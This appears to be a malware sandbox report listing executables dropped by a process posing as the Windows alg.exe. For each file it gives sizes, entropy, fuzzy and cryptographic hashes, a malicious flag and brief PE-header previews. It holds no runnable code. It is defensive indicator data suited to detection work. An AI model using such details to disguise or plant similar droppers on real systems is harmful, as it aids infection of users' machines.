                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1157120
                                                                                                                                                                                                    Entropy (8bit):5.041484847271702
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:XyXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:XysqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:0AFF75EF0352E6576D2936A57DC0AC7E
                                                                                                                                                                                                    SHA1:27A63740C7402624947B7B9C510BC05B89134D78
                                                                                                                                                                                                    SHA-256:4F2756DF0D7675E03205A471DC9BC75472A71A435C6AE99ABE4FE79738C35FEF
                                                                                                                                                                                                    SHA-512:6648A2CD2D4990620588FBF767DA2A7B03873836750F221A2A48848EBC5FE0AB041D39BC834A6D40779B9442EA91E0ED4D350A4382A0360EC29E88B15EECCBFC
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@.......................................... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...P.......@...h..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):12039168
                                                                                                                                                                                                    Entropy (8bit):6.596677452612494
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:98304:db+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKFD527BWG:hnPgTHIwZoRBk9DdhSUEVIXgKFVQBWG
                                                                                                                                                                                                    MD5:0C860AD353B3B125124C7A18786B73B4
                                                                                                                                                                                                    SHA1:84D802EC1E5AA189E713F6A4523A06CA875CA643
                                                                                                                                                                                                    SHA-256:7E0CC98E11EFF2BE8D01DDCDA1AF456533933A55D5859DAE532EE0BD04A1D6B2
                                                                                                                                                                                                    SHA-512:4E66A5FF6286975993754757AD2BA48137A1F3F735C8BB2E98B0CBD66B0A777A9C22D3B46C775BC7653BAB89ED462CBCA80A53176DAF07A7C6B2C8B31F5057F3
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@.....................................c.... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1322496
                                                                                                                                                                                                    Entropy (8bit):5.281817612276051
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:Bg5FvCPusBsqjnhMgeiCl7G0nehbGZpbD:WftqDmg27RnWGj
                                                                                                                                                                                                    MD5:48AA62F59CD9DF8C50C62F09038D5F54
                                                                                                                                                                                                    SHA1:4664ECD8DB4BCBDAA8AD1E09011B0233220AF336
                                                                                                                                                                                                    SHA-256:9717043B03475378871059D34DFBA8C81BCD5961A7974642675BAD433CACC941
                                                                                                                                                                                                    SHA-512:DD432C59F664D6B34B433BE5EAB2FA45915EA228C283E68522FEA80D92420378ED500B9D2460730774006550834ED061E84AB2414B18C75F45EF649FDBE3EB80
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................p............ .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1339904
                                                                                                                                                                                                    Entropy (8bit):7.208885954630813
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:PjKTIsAjFuvtIfmFthMaT5U8aChaeuDsqjnhMgeiCl7G0nehbGZpbD:PjIMmPh7TT79yDmg27RnWGj
                                                                                                                                                                                                    MD5:63F92C4C26868D108B6B28BA4892655B
                                                                                                                                                                                                    SHA1:3F1B331CA93F8D5D441AFAA0001D548CD9837B64
                                                                                                                                                                                                    SHA-256:BF3E40F22EF00EBCC2CA6E2E5DB4E3AFE31D963DEF96199406F6E4EC848EAF6C
                                                                                                                                                                                                    SHA-512:E075C2480E407669AD7DB8026FC68F14D39FBACEA9FB009FD4ADA2C3764497A95D2D0C7483336F9A113219A08572B7EE801E9B7FF3DF394D02A14B49C0750A8C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$........... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1515520
                                                                                                                                                                                                    Entropy (8bit):5.411765492545051
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:2GqVwCto1Gm5WgHsqjnhMgeiCl7G0nehbGZpbD:DZ1GmUUDmg27RnWGj
                                                                                                                                                                                                    MD5:BCA2788EFD21B6CC8B9C9EA723B356F6
                                                                                                                                                                                                    SHA1:0CBF25F35DD7DCFBEA82D8DAD6BCBBDF4B8228A7
                                                                                                                                                                                                    SHA-256:60E4139C5749A42A056EBFD9C2131CABC1B9715A225D01C5202D3F3B0C986C03
                                                                                                                                                                                                    SHA-512:DDFBF52A5BD620244E093F55429CDAFAAEE85DE83702A314BFD4BAE0147E2664B0945DA04CECFCBC97048FF67360CB396EC708D6FB9592C70F7C7A357EA952E3
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@.......................................... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1253376
                                                                                                                                                                                                    Entropy (8bit):5.157405525960229
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:wWBWjXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:wWBWjsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:3232CEFA51D0D84FA80C1E6445B229BE
                                                                                                                                                                                                    SHA1:6F9A4EEEE7ACDAB75CA16B666A36CD7733F7D2F9
                                                                                                                                                                                                    SHA-256:E9CF72ED592738B18D87636884F9F29C93834AB680A6A3B3F0509E6B157235B9
                                                                                                                                                                                                    SHA-512:69A1B3CAB049A71B9F331C0049A4FBD09411A53CF3032E4B911CAF80F2C6E79976B99998B7BEC1B3584BEBFA39F83C0BB4925DBABAF4F7CCD319B8D83168B436
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................`............ .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1683968
                                                                                                                                                                                                    Entropy (8bit):7.228486047237038
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:bf9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa0UsqjnhMgeiCl7G0nehbGZpbDl:b+GtCi27mVTyT+a0wDmg27RnWGjN
                                                                                                                                                                                                    MD5:5A6BD28498F1AAA89D69F360DD2BC4E6
                                                                                                                                                                                                    SHA1:F76035A2335741A20AF9A31A5D03F08108791CCA
                                                                                                                                                                                                    SHA-256:1524D7A8746E95D2E786DDD4704DE47AC5D10A395DEF516F44BF6C4FC09C986E
                                                                                                                                                                                                    SHA-512:60D220F90C65111F68F497430E5581E71BB081BE8EFBE69FF22929A43AA1DB72BBDAF7D8D181DB1AA414069CC9F1DF99D795339CC09220AFAC77048342080A89
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@.......................................... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3110912
                                                                                                                                                                                                    Entropy (8bit):6.649654695066131
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:49152:4U198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYjDmg27RnWGj:J2NfHOIK5Ns6qR95D527BWG
                                                                                                                                                                                                    MD5:899D12BB669C4FC3B647C99931F9B142
                                                                                                                                                                                                    SHA1:FBF78023654721601E8ADB7088398F2A2E587712
                                                                                                                                                                                                    SHA-256:317667C0866B64BBF0AE9695A7D6CE3FFACCBDE13C7F727E724C0B21E8E5909F
                                                                                                                                                                                                    SHA-512:4A58C850C9039288D02DED7348AB3DC7C5071BC8D9CB57CA81F65A9C2C5F151EB398A2C21409AC4C38CFBB212791E2C296E68FE05A386C37319BFA02B8907F75
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0.....`./... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1588224
                                                                                                                                                                                                    Entropy (8bit):5.531909535100647
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:6kcWTUQcyd3sqjnhMgeiCl7G0nehbGZpbD:6hKUoDmg27RnWGj
                                                                                                                                                                                                    MD5:B0554DF901AA8D7F42D7DE364AAF3AA9
                                                                                                                                                                                                    SHA1:A854EC18DBB59B3AC23A33BFCDA7A12B35A7D018
                                                                                                                                                                                                    SHA-256:CCA2579A145AF95EEE6E78FBCA2CBF4BF97140BC527AD90B64BA02F21E289D27
                                                                                                                                                                                                    SHA-512:DBE3DEAA92CD127C1B89685B1C3EE4610BB0B739EBA09B26E3A0C4F659520CC9D4E476316630FFC37210C2DDCF75789D840D0C7376E2C8EFAA365388A6436F26
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@......................................... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...`...@...P..................@...................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1338368
                                                                                                                                                                                                    Entropy (8bit):5.35266432616946
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:WfY+FUBkXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:WA+qBksqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:5865F4C40446FCCFA155C72DB2C2F781
                                                                                                                                                                                                    SHA1:3A7EF093616AB80DE32F3F58835FB33FC9DA1127
                                                                                                                                                                                                    SHA-256:56A96046EB207B38D5D7F0D93D7965A2C1A0BF9F487EFAF6D9EEB7DED32083AF
                                                                                                                                                                                                    SHA-512:46C049AD9EE6A07ED81CAE5058A6C977213897A0E22C12FA6D06BE9AA768072BEC488EAB216AA4FA9A328A98A7714BA3BC2119314451F25832FACAD2CBCFBE8D
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@.................................lj..............................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc...p...@...`..................@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1143296
                                                                                                                                                                                                    Entropy (8bit):5.02266547868689
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:dXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:dsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:8B71046F0D44482610872999D140E391
                                                                                                                                                                                                    SHA1:4FF4F35280D4580E1AF67D18405A01A24860196A
                                                                                                                                                                                                    SHA-256:E24274EE7D3C72F81C215C4BD69C2C1BAF5A2F02F7609CD7C9CB6CFFABC07C25
                                                                                                                                                                                                    SHA-512:C9DD26355BAAE71D0638079E9D9ABB67F6DF5170BC628F61CFA56BA89FACA95390B5AA34CE2FE2AF3DA85195362A1FAB956B30AC22DA9155FB627CE5C2BF43C2
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@....................................Um.... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...P.......@...2..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1161728
                                                                                                                                                                                                    Entropy (8bit):5.047155930044599
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:54Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:6sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:F70552D5EC11C91F438F6D4AEBF76C5F
                                                                                                                                                                                                    SHA1:F9E37FC1A2CC8E6CF98F861EFCFAAFE16DD57060
                                                                                                                                                                                                    SHA-256:2397AB6AAFDFB1F0760C37A808484F163CA6000EE772FDF75E1365A6F944A803
                                                                                                                                                                                                    SHA-512:A3F6B16CAA0DD8823584143E6A7045C98C7C5C3323D2E4296044E6AB6CE91C49BD4B402070B2F559D8192A572BA435263411E9E9C5E93539D8A5837B520634DF
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@....................................NC.... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...P.......@...z..............@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4151808
                                                                                                                                                                                                    Entropy (8bit):6.499781905475844
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:49152:UtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755VDmg27RN:UjEIa4HIEWOc5DD527BWG
                                                                                                                                                                                                    MD5:1E57719BDE81CE0E81771D9976F84A17
                                                                                                                                                                                                    SHA1:FB234B102D1C3DDB0726F82213580A38150CD716
                                                                                                                                                                                                    SHA-256:DA56A20127B206E59E27743553CF35D936A61085EED976C544E2348BA621E4F0
                                                                                                                                                                                                    SHA-512:D57B34A3E5448D33C5B18830E916A44EE6BAA22D3C16B8AF9C54B2374F037B7FD8605609BF972A7DB763E0BF97A95E11EF62C2E801BBAB59996DC22B9258CA98
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.....Y.?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):59941376
                                                                                                                                                                                                    Entropy (8bit):7.999367300904618
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1572864:PQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:YXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                    MD5:37820C6C32DA7A89BC0891E00C3D61F7
                                                                                                                                                                                                    SHA1:18CBD0553946751381449D0890B2AA747A13F56C
                                                                                                                                                                                                    SHA-256:4BC103ADD5B06E68E4A89D15E3118D43301E0A47303B4BD589EB268D1DCA4B18
                                                                                                                                                                                                    SHA-512:05AF7A3C05A5D113680CEBEC349F80888AC8694FB79B4AEB8B543B855A8AC2BB53CD34CA7BCFD29D81665FCFF2AEF959F3C436AE81E880792FFC2159FC3F66C3
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0.......D.... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1230336
                                                                                                                                                                                                    Entropy (8bit):5.185590386081266
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:ZejVWYUA4Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:EjkY74sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:4A47C6FDAF693750BDCFA5A0FBB9F582
                                                                                                                                                                                                    SHA1:4E0C6850630C583A1477F4168EE3E73791996E32
                                                                                                                                                                                                    SHA-256:C166893533CB0C68C7CA1BCAFBF9BF8665F15D959A646639A0CAE1FCDB4EA7C1
                                                                                                                                                                                                    SHA-512:FBA889F1B5516F42B65DF1CF069B873464ABB427E3DC8F14B22E1FE3B5C65B5C6BD83F9DCE81935EE6DBBD02F157F98B8E1171EA6631B25F44C2527FF03677B6
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@.................................e........................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...`.......P...v..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1384960
                                                                                                                                                                                                    Entropy (8bit):5.377813053938689
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:xxwSJhkrmZsMsqjnhMgeiCl7G0nehbGZpbD:xy+krKs4Dmg27RnWGj
                                                                                                                                                                                                    MD5:6723480D53AA350290D2BB95C7A24C95
                                                                                                                                                                                                    SHA1:0077B6599C7C6312A228F02F66168475B43D4DB5
                                                                                                                                                                                                    SHA-256:BBCBE5748FB87EA5C6CBEB10064E5D75C9E8207B2AD5AF03B0D43E45F89031F7
                                                                                                                                                                                                    SHA-512:A09C18410BEAEE3FDCD0A21540DADBD2A76AC5B0C54FB4E85D65F487042B809A3A8DFEC554855C3D9326B82B113A0AE63D575E1BD76C37F331EFA17824CF74DD
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@....................................N+.... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1649152
                                                                                                                                                                                                    Entropy (8bit):5.63272711706388
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:THQJLIRgvsnNdsqjnhMgeiCl7G0nehbGZpbD:THQJL34BDmg27RnWGj
                                                                                                                                                                                                    MD5:A0CDFD098B24925BB9174A9C6816F440
                                                                                                                                                                                                    SHA1:5E7F9CD6E6A4A8E1C6D1A3EEE70B7B9EFBBCAE18
                                                                                                                                                                                                    SHA-256:4A370135FFF39DC9798F22D85CAC3602539302AD3739F0D6C43D758A937DE588
                                                                                                                                                                                                    SHA-512:02430622D0DC6D550F0E2F6CB9D825BD50F692C93DFB9A66EF965810FDE163E049D62AC0F07D7B34D450A50251F83EE390BC6B630B897ABB04FC293066D0A975
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@....................................Z..... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):5365760
                                                                                                                                                                                                    Entropy (8bit):6.450964923485017
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:49152:qUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1kE:FWmXL6DEC7dRpKuDQbgeD527BWG
                                                                                                                                                                                                    MD5:35316BF36FDE7E18783FC432D9734D45
                                                                                                                                                                                                    SHA1:E24C9D4E6A372C29ADDD959AC1814FB2B60CDEC7
                                                                                                                                                                                                    SHA-256:FF3F006F53DB44BD0B82C222A5D26AEBA02425D600D6001F09B9B1993F6F3D50
                                                                                                                                                                                                    SHA-512:46FA4C23D2B6D9388318B362E68196BF574C933A1ACC83ACBBC19BD61660C8B224DF184AA07C62B8A8C770D691A41536949641F261577BDC1CD16D2B77D25A41
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
